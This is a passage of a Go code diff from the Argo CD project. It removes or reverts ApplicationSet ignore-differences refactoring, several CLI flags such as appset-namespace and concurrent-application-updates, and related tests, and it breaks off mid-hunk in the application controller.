scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
@@ -7950,40 +7517,6 @@ func TestIsRollingSyncStrategy(t *testing.T) {
}
}
func TestFirstAppError(t *testing.T) {
errA := errors.New("error from app-a")
errB := errors.New("error from app-b")
errC := errors.New("error from app-c")
t.Run("returns nil for empty map", func(t *testing.T) {
assert.NoError(t, firstAppError(map[string]error{}))
})
t.Run("returns the single error", func(t *testing.T) {
assert.ErrorIs(t, firstAppError(map[string]error{"app-a": errA}), errA)
})
t.Run("returns error from lexicographically first app name", func(t *testing.T) {
appErrors := map[string]error{
"app-c": errC,
"app-a": errA,
"app-b": errB,
}
assert.ErrorIs(t, firstAppError(appErrors), errA)
})
t.Run("result is stable across multiple calls with same input", func(t *testing.T) {
appErrors := map[string]error{
"app-c": errC,
"app-a": errA,
"app-b": errB,
}
for range 10 {
assert.ErrorIs(t, firstAppError(appErrors), errA, "firstAppError must return the same error on every call")
}
})
}
func TestSyncApplication(t *testing.T) {
tests := []struct {
name string


@@ -24,43 +24,6 @@ import (
"github.com/argoproj/argo-cd/v3/util/argo/normalizers"
)
var appEquality = conversion.EqualitiesOrDie(
func(a, b resource.Quantity) bool {
// Ignore formatting, only care that numeric value stayed the same.
// TODO: if we decide it's important, it should be safe to start comparing the format.
//
// Uninitialized quantities are equivalent to 0 quantities.
return a.Cmp(b) == 0
},
func(a, b metav1.MicroTime) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b metav1.Time) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b labels.Selector) bool {
return a.String() == b.String()
},
func(a, b fields.Selector) bool {
return a.String() == b.String()
},
func(a, b argov1alpha1.ApplicationDestination) bool {
return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
},
)
// BuildIgnoreDiffConfig constructs a DiffConfig from the ApplicationSet's ignoreDifferences rules.
// Returns nil when ignoreDifferences is empty.
func BuildIgnoreDiffConfig(ignoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) (argodiff.DiffConfig, error) {
if len(ignoreDifferences) == 0 {
return nil, nil
}
return argodiff.NewDiffConfigBuilder().
WithDiffSettings(ignoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
WithNoCache().
Build()
}
// CreateOrUpdate overrides "sigs.k8s.io/controller-runtime" function
// in sigs.k8s.io/controller-runtime/pkg/controller/controllerutil/controllerutil.go
// to add equality for argov1alpha1.ApplicationDestination
@@ -71,15 +34,10 @@ func BuildIgnoreDiffConfig(ignoreDifferences argov1alpha1.ApplicationSetIgnoreDi
// cluster. The object's desired state must be reconciled with the existing
// state inside the passed in callback MutateFn.
//
-// diffConfig must be built once per reconcile cycle via BuildIgnoreDiffConfig and may be nil
-// when there are no ignoreDifferences rules. obj.Spec must already be normalized by the caller
-// via NormalizeApplicationSpec before this function is called; the live object fetched from the
-// cluster is normalized internally.
-//
 // The MutateFn is called regardless of creating or updating an object.
 //
 // It returns the executed operation and an error.
-func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, diffConfig argodiff.DiffConfig, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
+func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, ignoreAppDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
key := client.ObjectKeyFromObject(obj)
if err := c.Get(ctx, key, obj); err != nil {
if !errors.IsNotFound(err) {
@@ -101,18 +59,43 @@ func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, dif
return controllerutil.OperationResultNone, err
}
-	// Normalize the live spec to avoid spurious diffs from unimportant differences (e.g. nil vs
-	// empty SyncPolicy). obj.Spec is already normalized by the caller; only the live side needs it.
-	normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
 	// Apply ignoreApplicationDifferences rules to remove ignored fields from both the live and the desired state. This
 	// prevents those differences from appearing in the diff and therefore in the patch.
-	err := applyIgnoreDifferences(diffConfig, normalizedLive, obj)
+	err := applyIgnoreDifferences(ignoreAppDifferences, normalizedLive, obj, ignoreNormalizerOpts)
 	if err != nil {
 		return controllerutil.OperationResultNone, fmt.Errorf("failed to apply ignore differences: %w", err)
 	}
-	if appEquality.DeepEqual(normalizedLive, obj) {
+	// Normalize to avoid diffing on unimportant differences.
+	normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
+	obj.Spec = *argo.NormalizeApplicationSpec(&obj.Spec)
+	equality := conversion.EqualitiesOrDie(
+		func(a, b resource.Quantity) bool {
+			// Ignore formatting, only care that numeric value stayed the same.
+			// TODO: if we decide it's important, it should be safe to start comparing the format.
+			//
+			// Uninitialized quantities are equivalent to 0 quantities.
+			return a.Cmp(b) == 0
+		},
+		func(a, b metav1.MicroTime) bool {
+			return a.UTC().Equal(b.UTC())
+		},
+		func(a, b metav1.Time) bool {
+			return a.UTC().Equal(b.UTC())
+		},
+		func(a, b labels.Selector) bool {
+			return a.String() == b.String()
+		},
+		func(a, b fields.Selector) bool {
+			return a.String() == b.String()
+		},
+		func(a, b argov1alpha1.ApplicationDestination) bool {
+			return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
+		},
+	)
+	if equality.DeepEqual(normalizedLive, obj) {
return controllerutil.OperationResultNone, nil
}
@@ -152,13 +135,19 @@ func mutate(f controllerutil.MutateFn, key client.ObjectKey, obj client.Object)
}
 // applyIgnoreDifferences applies the ignore differences rules to the found application. It modifies the applications in place.
-// diffConfig may be nil, in which case this is a no-op.
-func applyIgnoreDifferences(diffConfig argodiff.DiffConfig, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application) error {
-	if diffConfig == nil {
+func applyIgnoreDifferences(applicationSetIgnoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) error {
+	if len(applicationSetIgnoreDifferences) == 0 {
 		return nil
 	}
 	generatedAppCopy := generatedApp.DeepCopy()
+	diffConfig, err := argodiff.NewDiffConfigBuilder().
+		WithDiffSettings(applicationSetIgnoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
+		WithNoCache().
+		Build()
+	if err != nil {
+		return fmt.Errorf("failed to build diff config: %w", err)
+	}
unstructuredFound, err := appToUnstructured(found)
if err != nil {
return fmt.Errorf("failed to convert found application to unstructured: %w", err)


@@ -5,7 +5,7 @@ import (
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
-	"go.yaml.in/yaml/v3"
+	"gopkg.in/yaml.v3"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"github.com/argoproj/argo-cd/v3/pkg/apis/application/v1alpha1"
@@ -224,9 +224,7 @@ spec:
generatedApp := v1alpha1.Application{TypeMeta: appMeta}
err = yaml.Unmarshal([]byte(tc.generatedApp), &generatedApp)
require.NoError(t, err, tc.generatedApp)
-			diffConfig, err := BuildIgnoreDiffConfig(tc.ignoreDifferences, normalizers.IgnoreNormalizerOpts{})
-			require.NoError(t, err)
-			err = applyIgnoreDifferences(diffConfig, &foundApp, &generatedApp)
+			err = applyIgnoreDifferences(tc.ignoreDifferences, &foundApp, &generatedApp, normalizers.IgnoreNormalizerOpts{})
require.NoError(t, err)
yamlFound, err := yaml.Marshal(tc.foundApp)
require.NoError(t, err)

assets/swagger.json generated

@@ -9727,10 +9727,6 @@
"username": {
"type": "string",
"title": "Username contains the user name used for authenticating at the remote repository"
},
"webhookManifestCacheWarmDisabled": {
"description": "WebhookManifestCacheWarmDisabled disables manifest cache warming during webhook processing for this repository.\nWhen set, webhook handlers will only trigger reconciliation for affected applications and skip Redis cache\noperations for unaffected ones. Recommended for large monorepos with plain YAML manifests.",
"type": "boolean"
}
}
},


@@ -79,7 +79,6 @@ func NewCommand() *cobra.Command {
tokenRefStrictMode bool
maxResourcesStatusCount int
cacheSyncPeriod time.Duration
concurrentApplicationUpdates int
)
scheme := runtime.NewScheme()
_ = clientgoscheme.AddToScheme(scheme)
@@ -240,25 +239,24 @@ func NewCommand() *cobra.Command {
})
if err = (&controllers.ApplicationSetReconciler{
-		Generators:                   topLevelGenerators,
-		Client:                       utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
-		Scheme:                       mgr.GetScheme(),
-		Recorder:                     mgr.GetEventRecorderFor("applicationset-controller"),
-		Renderer:                     &utils.Render{},
-		Policy:                       policyObj,
-		EnablePolicyOverride:         enablePolicyOverride,
-		KubeClientset:                k8sClient,
-		ArgoDB:                       argoCDDB,
-		ArgoCDNamespace:              namespace,
-		ApplicationSetNamespaces:     applicationSetNamespaces,
-		EnableProgressiveSyncs:       enableProgressiveSyncs,
-		SCMRootCAPath:                scmRootCAPath,
-		GlobalPreservedAnnotations:   globalPreservedAnnotations,
-		GlobalPreservedLabels:        globalPreservedLabels,
-		Metrics:                      &metrics,
-		MaxResourcesStatusCount:      maxResourcesStatusCount,
-		ClusterInformer:              clusterInformer,
-		ConcurrentApplicationUpdates: concurrentApplicationUpdates,
+		Generators:                 topLevelGenerators,
+		Client:                     utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
+		Scheme:                     mgr.GetScheme(),
+		Recorder:                   mgr.GetEventRecorderFor("applicationset-controller"),
+		Renderer:                   &utils.Render{},
+		Policy:                     policyObj,
+		EnablePolicyOverride:       enablePolicyOverride,
+		KubeClientset:              k8sClient,
+		ArgoDB:                     argoCDDB,
+		ArgoCDNamespace:            namespace,
+		ApplicationSetNamespaces:   applicationSetNamespaces,
+		EnableProgressiveSyncs:     enableProgressiveSyncs,
+		SCMRootCAPath:              scmRootCAPath,
+		GlobalPreservedAnnotations: globalPreservedAnnotations,
+		GlobalPreservedLabels:      globalPreservedLabels,
+		Metrics:                    &metrics,
+		MaxResourcesStatusCount:    maxResourcesStatusCount,
+		ClusterInformer:            clusterInformer,
}).SetupWithManager(mgr, enableProgressiveSyncs, maxConcurrentReconciliations); err != nil {
log.Error(err, "unable to create controller", "controller", "ApplicationSet")
os.Exit(1)
@@ -305,7 +303,6 @@ func NewCommand() *cobra.Command {
command.Flags().BoolVar(&enableGitHubAPIMetrics, "enable-github-api-metrics", env.ParseBoolFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_GITHUB_API_METRICS", false), "Enable GitHub API metrics for generators that use the GitHub API")
command.Flags().IntVar(&maxResourcesStatusCount, "max-resources-status-count", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_MAX_RESOURCES_STATUS_COUNT", 5000, 0, math.MaxInt), "Max number of resources stored in appset status.")
command.Flags().DurationVar(&cacheSyncPeriod, "cache-sync-period", env.ParseDurationFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CACHE_SYNC_PERIOD", time.Hour*10, 0, time.Hour*24), "Period at which the manager client cache is forcefully resynced with the Kubernetes API server. 0 disables periodic resync.")
command.Flags().IntVar(&concurrentApplicationUpdates, "concurrent-application-updates", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CONCURRENT_APPLICATION_UPDATES", 1, 1, 200), "Number of concurrent Application create/update/delete operations per ApplicationSet reconcile.")
return &command
}


@@ -1,28 +0,0 @@
package command
import (
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestNewCommand_ConcurrentApplicationUpdatesFlag(t *testing.T) {
cmd := NewCommand()
flag := cmd.Flags().Lookup("concurrent-application-updates")
require.NotNil(t, flag, "expected --concurrent-application-updates flag to be registered")
assert.Equal(t, "int", flag.Value.Type())
assert.Equal(t, "1", flag.DefValue, "default should be 1")
}
func TestNewCommand_ConcurrentApplicationUpdatesFlagValue(t *testing.T) {
cmd := NewCommand()
err := cmd.Flags().Set("concurrent-application-updates", "5")
require.NoError(t, err)
val, err := cmd.Flags().GetInt("concurrent-application-updates")
require.NoError(t, err)
assert.Equal(t, 5, val)
}


@@ -34,7 +34,6 @@ import (
"github.com/argoproj/argo-cd/v3/util/dex"
"github.com/argoproj/argo-cd/v3/util/env"
"github.com/argoproj/argo-cd/v3/util/errors"
utilglob "github.com/argoproj/argo-cd/v3/util/glob"
"github.com/argoproj/argo-cd/v3/util/kube"
"github.com/argoproj/argo-cd/v3/util/templates"
"github.com/argoproj/argo-cd/v3/util/tls"
@@ -88,7 +87,6 @@ func NewCommand() *cobra.Command {
applicationNamespaces []string
enableProxyExtension bool
webhookParallelism int
globCacheSize int
hydratorEnabled bool
syncWithReplaceAllowed bool
@@ -124,7 +122,6 @@ func NewCommand() *cobra.Command {
cli.SetLogFormat(cmdutil.LogFormat)
cli.SetLogLevel(cmdutil.LogLevel)
cli.SetGLogLevel(glogLevel)
utilglob.SetCacheSize(globCacheSize)
// Recover from panic and log the error using the configured logger instead of the default.
defer func() {
@@ -329,7 +326,6 @@ func NewCommand() *cobra.Command {
command.Flags().StringSliceVar(&applicationNamespaces, "application-namespaces", env.StringsFromEnv("ARGOCD_APPLICATION_NAMESPACES", []string{}, ","), "List of additional namespaces where application resources can be managed in")
command.Flags().BoolVar(&enableProxyExtension, "enable-proxy-extension", env.ParseBoolFromEnv("ARGOCD_SERVER_ENABLE_PROXY_EXTENSION", false), "Enable Proxy Extension feature")
command.Flags().IntVar(&webhookParallelism, "webhook-parallelism-limit", env.ParseNumFromEnv("ARGOCD_SERVER_WEBHOOK_PARALLELISM_LIMIT", 50, 1, 1000), "Number of webhook requests processed concurrently")
command.Flags().IntVar(&globCacheSize, "glob-cache-size", env.ParseNumFromEnv("ARGOCD_SERVER_GLOB_CACHE_SIZE", utilglob.DefaultGlobCacheSize, 1, math.MaxInt32), "Maximum number of compiled glob patterns to cache for RBAC evaluation")
command.Flags().StringSliceVar(&enableK8sEvent, "enable-k8s-event", env.StringsFromEnv("ARGOCD_ENABLE_K8S_EVENT", argo.DefaultEnableEventList(), ","), "Enable ArgoCD to use k8s events. To disable all events, set the value to `none` (e.g. --enable-k8s-event=none). To enable specific events, set the value to the event reasons (e.g. --enable-k8s-event=StatusRefreshed,ResourceCreated)")
command.Flags().BoolVar(&hydratorEnabled, "hydrator-enabled", env.ParseBoolFromEnv("ARGOCD_HYDRATOR_ENABLED", false), "Feature flag to enable Hydrator. Default (\"false\")")
command.Flags().BoolVar(&syncWithReplaceAllowed, "sync-with-replace-allowed", env.ParseBoolFromEnv("ARGOCD_SYNC_WITH_REPLACE_ALLOWED", true), "Whether to allow users to select replace for syncs from UI/CLI")

View File

@@ -149,7 +149,6 @@ func NewGenRepoSpecCommand() *cobra.Command {
repoOpts.Repo.EnableOCI = repoOpts.EnableOci
repoOpts.Repo.UseAzureWorkloadIdentity = repoOpts.UseAzureWorkloadIdentity
repoOpts.Repo.InsecureOCIForceHttp = repoOpts.InsecureOCIForceHTTP
repoOpts.Repo.WebhookManifestCacheWarmDisabled = repoOpts.WebhookManifestCacheWarmDisabled
if repoOpts.Repo.Type == "helm" && repoOpts.Repo.Name == "" {
errors.CheckError(stderrors.New("must specify --name for repos of type 'helm'"))

View File

@@ -2334,7 +2334,7 @@ func NewApplicationSyncCommand(clientOpts *argocdclient.ClientOptions) *cobra.Co
if app.Spec.HasMultipleSources() {
if revision != "" {
log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-positions instead.")
log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-position instead.")
return
}

View File

@@ -8,7 +8,7 @@ import (
"strings"
"text/tabwriter"
"go.yaml.in/yaml/v3"
"gopkg.in/yaml.v3"
"github.com/argoproj/argo-cd/v3/util/templates"

View File

@@ -40,10 +40,6 @@ var appSetExample = templates.Examples(`
# Delete an ApplicationSet
argocd appset delete APPSETNAME (APPSETNAME...)
# Namespace precedence for --appset-namespace (-N):
# - get/delete: if the argument is namespace/name, that namespace wins; -N is ignored.
# - create/generate: metadata.namespace in the YAML wins when set; -N applies only when the manifest omits namespace.
`)
// NewAppSetCommand returns a new instance of an `argocd appset` command
@@ -68,9 +64,8 @@ func NewAppSetCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
// NewApplicationSetGetCommand returns a new instance of an `argocd appset get` command
func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var (
output string
showParams bool
appSetNamespace string
output string
showParams bool
)
command := &cobra.Command{
Use: "get APPSETNAME",
@@ -78,13 +73,6 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
Example: templates.Examples(`
# Get ApplicationSets
argocd appset get APPSETNAME
# Get ApplicationSet in a specific namespace using qualified name (namespace/name)
argocd appset get APPSET_NAMESPACE/APPSETNAME
# Get ApplicationSet in a specific namespace using --appset-namespace flag
argocd appset get --appset-namespace=APPSET_NAMESPACE APPSETNAME
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -97,7 +85,7 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
conn, appIf := acdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
appSetName, appSetNs := argo.ParseFromQualifiedName(args[0], appSetNamespace)
appSetName, appSetNs := argo.ParseFromQualifiedName(args[0], "")
appSet, err := appIf.Get(ctx, &applicationset.ApplicationSetGetQuery{Name: appSetName, AppsetNamespace: appSetNs})
errors.CheckError(err)
@@ -125,7 +113,6 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
}
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().BoolVar(&showParams, "show-params", false, "Show ApplicationSet parameters and overrides")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Only get ApplicationSet from a namespace (ignored when qualified name is provided)")
return command
}
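The removed `--appset-namespace` handling hinged on `argo.ParseFromQualifiedName`: a `namespace/name` argument carries its own namespace, which takes precedence; only a bare name falls back to the second argument (previously the `-N` flag value, now always `""`). A hedged sketch of that precedence (the helper below is illustrative, not the real `util/argo` implementation):

```go
package main

import (
	"fmt"
	"strings"
)

// parseQualifiedName sketches argo.ParseFromQualifiedName: an argument of the
// form "namespace/name" supplies its own namespace; otherwise the fallback
// namespace is used.
func parseQualifiedName(arg, fallbackNamespace string) (name, namespace string) {
	parts := strings.SplitN(arg, "/", 2)
	if len(parts) == 2 {
		return parts[1], parts[0]
	}
	return arg, fallbackNamespace
}

func main() {
	name, ns := parseQualifiedName("team-a/my-appset", "ignored")
	fmt.Println(name, ns) // my-appset team-a
	name, ns = parseQualifiedName("my-appset", "argocd")
	fmt.Println(name, ns) // my-appset argocd
}
```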
@@ -134,7 +121,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
var (
output string
upsert, dryRun, wait bool
appSetNamespace string
)
command := &cobra.Command{
Use: "create",
@@ -143,9 +129,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
# Create ApplicationSets
argocd appset create <filename or URL> (<filename or URL>...)
# Create ApplicationSet in a specific namespace using --appset-namespace flag
argocd appset create --appset-namespace=APPSET_NAMESPACE <filename or URL> (<filename or URL>...)
# Dry-run AppSet creation to see what applications would be managed
argocd appset create --dry-run <filename or URL> -o json | jq -r '.status.resources[].name'
`),
@@ -174,11 +157,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
conn, appIf := argocdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
if appset.Namespace == "" && appSetNamespace != "" {
fmt.Printf("ApplicationSet YAML file does not have namespace; using --appset-namespace=%q.\n", appSetNamespace)
appset.Namespace = appSetNamespace
}
// Get app before creating to see if it is being updated or no change
existing, err := appIf.Get(ctx, &applicationset.ApplicationSetGetQuery{Name: appset.Name, AppsetNamespace: appset.Namespace})
if grpc.UnwrapGRPCStatus(err).Code() != codes.NotFound {
@@ -240,23 +218,18 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
command.Flags().BoolVar(&dryRun, "dry-run", false, "Evaluate the ApplicationSet template on the server to get a preview of the applications that would be created")
command.Flags().BoolVar(&wait, "wait", false, "Wait until the ApplicationSet's resources are up to date. Will block indefinitely if the ApplicationSet has errors")
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace where the ApplicationSet will be created in (ignored when provided YAML file has namespace set in metadata)")
return command
}
// NewApplicationSetGenerateCommand returns a new instance of an `argocd appset generate` command
func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var output string
var appSetNamespace string
command := &cobra.Command{
Use: "generate",
Short: "Generate apps of ApplicationSet rendered templates",
Example: templates.Examples(`
# Generate apps of ApplicationSet rendered templates
argocd appset generate <filename or URL> (<filename or URL>...)
# Generate apps of ApplicationSet rendered templates in a specific namespace
argocd appset generate --appset-namespace=APPSET_NAMESPACE <filename or URL> (<filename or URL>...)
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -279,11 +252,6 @@ func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *c
errors.Fatal(errors.ErrorGeneric, fmt.Sprintf("Error generating apps for ApplicationSet %s. ApplicationSet does not have Name field set", appset))
}
if appset.Namespace == "" && appSetNamespace != "" {
fmt.Printf("ApplicationSet YAML file does not have namespace; using --appset-namespace=%q.\n", appSetNamespace)
appset.Namespace = appSetNamespace
}
conn, appIf := argocdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
@@ -318,7 +286,6 @@ func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *c
},
}
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace used for generating Applications (ignored when provided YAML file has namespace set in metadata)")
return command
}
@@ -371,9 +338,8 @@ func NewApplicationSetListCommand(clientOpts *argocdclient.ClientOptions) *cobra
// NewApplicationSetDeleteCommand returns a new instance of an `argocd appset delete` command
func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var (
noPrompt bool
wait bool
appSetNamespace string
noPrompt bool
wait bool
)
command := &cobra.Command{
Use: "delete",
@@ -381,12 +347,6 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
Example: templates.Examples(`
# Delete an applicationset
argocd appset delete APPSETNAME (APPSETNAME...)
# Delete ApplicationSet in a specific namespace using qualified name (namespace/name)
argocd appset delete APPSET_NAMESPACE/APPSETNAME
# Delete ApplicationSet in a specific namespace using --appset-namespace flag
argocd appset delete --appset-namespace=APPSET_NAMESPACE APPSETNAME
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -415,7 +375,7 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
promptUtil := utils.NewPrompt(isTerminal && !noPrompt)
for _, appSetQualifiedName := range args {
appSetName, appSetNs := argo.ParseFromQualifiedName(appSetQualifiedName, appSetNamespace)
appSetName, appSetNs := argo.ParseFromQualifiedName(appSetQualifiedName, "")
appsetDeleteReq := applicationset.ApplicationSetDeleteRequest{
Name: appSetName,
@@ -452,7 +412,6 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
}
command.Flags().BoolVarP(&noPrompt, "yes", "y", false, "Turn off prompting to confirm cascaded deletion of Application resources")
command.Flags().BoolVar(&wait, "wait", false, "Wait until deletion of the applicationset(s) completes")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace where the ApplicationSet will be deleted from (ignored when qualified name is provided)")
return command
}

View File

@@ -192,7 +192,6 @@ func NewRepoAddCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
repoOpts.Repo.ForceHttpBasicAuth = repoOpts.ForceHttpBasicAuth
repoOpts.Repo.UseAzureWorkloadIdentity = repoOpts.UseAzureWorkloadIdentity
repoOpts.Repo.Depth = repoOpts.Depth
repoOpts.Repo.WebhookManifestCacheWarmDisabled = repoOpts.WebhookManifestCacheWarmDisabled
if repoOpts.Repo.Type == "helm" && repoOpts.Repo.Name == "" {
errors.Fatal(errors.ErrorGeneric, "Must specify --name for repos of type 'helm'")

View File

@@ -8,27 +8,26 @@ import (
)
type RepoOptions struct {
Repo appsv1.Repository
Upsert bool
SshPrivateKeyPath string //nolint:revive //FIXME(var-naming)
InsecureOCIForceHTTP bool
InsecureIgnoreHostKey bool
InsecureSkipServerVerification bool
TlsClientCertPath string //nolint:revive //FIXME(var-naming)
TlsClientCertKeyPath string //nolint:revive //FIXME(var-naming)
EnableLfs bool
EnableOci bool
GithubAppId int64
GithubAppInstallationId int64
GithubAppPrivateKeyPath string
GitHubAppEnterpriseBaseURL string
Proxy string
NoProxy string
GCPServiceAccountKeyPath string
ForceHttpBasicAuth bool //nolint:revive //FIXME(var-naming)
UseAzureWorkloadIdentity bool
Depth int64
WebhookManifestCacheWarmDisabled bool
Repo appsv1.Repository
Upsert bool
SshPrivateKeyPath string //nolint:revive //FIXME(var-naming)
InsecureOCIForceHTTP bool
InsecureIgnoreHostKey bool
InsecureSkipServerVerification bool
TlsClientCertPath string //nolint:revive //FIXME(var-naming)
TlsClientCertKeyPath string //nolint:revive //FIXME(var-naming)
EnableLfs bool
EnableOci bool
GithubAppId int64
GithubAppInstallationId int64
GithubAppPrivateKeyPath string
GitHubAppEnterpriseBaseURL string
Proxy string
NoProxy string
GCPServiceAccountKeyPath string
ForceHttpBasicAuth bool //nolint:revive //FIXME(var-naming)
UseAzureWorkloadIdentity bool
Depth int64
}
func AddRepoFlags(command *cobra.Command, opts *RepoOptions) {
@@ -56,5 +55,4 @@ func AddRepoFlags(command *cobra.Command, opts *RepoOptions) {
command.Flags().BoolVar(&opts.UseAzureWorkloadIdentity, "use-azure-workload-identity", false, "whether to use azure workload identity for authentication")
command.Flags().BoolVar(&opts.InsecureOCIForceHTTP, "insecure-oci-force-http", false, "Use http when accessing an OCI repository")
command.Flags().Int64Var(&opts.Depth, "depth", 0, "Specify a custom depth for git clone operations. Unless specified, a full clone is performed (depth of 0)")
command.Flags().BoolVar(&opts.WebhookManifestCacheWarmDisabled, "webhook-manifest-cache-warm-disabled", false, "disable manifest cache warming during webhook processing for this repository (recommended for large monorepos with plain YAML manifests)")
}

View File

@@ -10,7 +10,7 @@ import (
"github.com/Masterminds/sprig/v3"
log "github.com/sirupsen/logrus"
"go.yaml.in/yaml/v3"
"gopkg.in/yaml.v3"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"github.com/argoproj/argo-cd/v3/commitserver/apiclient"
@@ -102,6 +102,9 @@ func WriteForPaths(root *os.Root, repoUrl, drySha string, dryCommitMetadata *app
}
}
// if no manifest changes then skip commit
if !atleastOneManifestChanged {
return false, nil
}
return atleastOneManifestChanged, nil
}
@@ -137,13 +140,11 @@ func writeReadme(root *os.Root, dirPath string, metadata hydrator.HydratorCommit
if err != nil && !os.IsExist(err) {
return fmt.Errorf("failed to create README file: %w", err)
}
defer func() {
err := readmeFile.Close()
if err != nil {
log.WithError(err).Error("failed to close README file")
}
}()
err = readmeTemplate.Execute(readmeFile, metadata)
closeErr := readmeFile.Close()
if closeErr != nil {
log.WithError(closeErr).Error("failed to close README file")
}
if err != nil {
return fmt.Errorf("failed to execute readme template: %w", err)
}

View File

@@ -1796,7 +1796,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
}
}
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
return processNext
}
logCtx.Warnf("Failed to get cached managed resources for tree reconciliation, fall back to full reconciliation")
@@ -1810,7 +1810,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
if hasErrors {
app.Status.Sync.Status = appv1.SyncStatusCodeUnknown
app.Status.Health.Status = health.HealthStatusUnknown
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
if err := ctrl.cache.SetAppResourcesTree(app.InstanceName(ctrl.namespace), &appv1.ApplicationTree{}); err != nil {
logCtx.WithError(err).Warn("failed to set app resource tree")
@@ -1951,7 +1951,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
}
}
ts.AddCheckpoint("process_finalizers_ms")
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
// This is partly a duplicate of patch_ms, but more descriptive and allows having a measurement for the next step.
ts.AddCheckpoint("persist_app_status_ms")
return processNext
@@ -2148,17 +2148,8 @@ func createMergePatch(orig, newV any) ([]byte, bool, error) {
return patch, string(patch) != "{}", nil
}
// persistReconciliationStatus persists updates to application status and consumes the refresh annotation.
func (ctrl *ApplicationController) persistReconciliationStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus) time.Duration {
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyRefresh)
return ctrl.persistAppStatus(orig, newStatus, newAnnotations)
}
// persistAppStatus persists updates to application status and optionally updates annotations.
// If no changes were made, it is a no-op
func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus, newAnnotations map[string]string) (patchDuration time.Duration) {
// persistAppStatus persists updates to application status. If no changes were made, it is a no-op
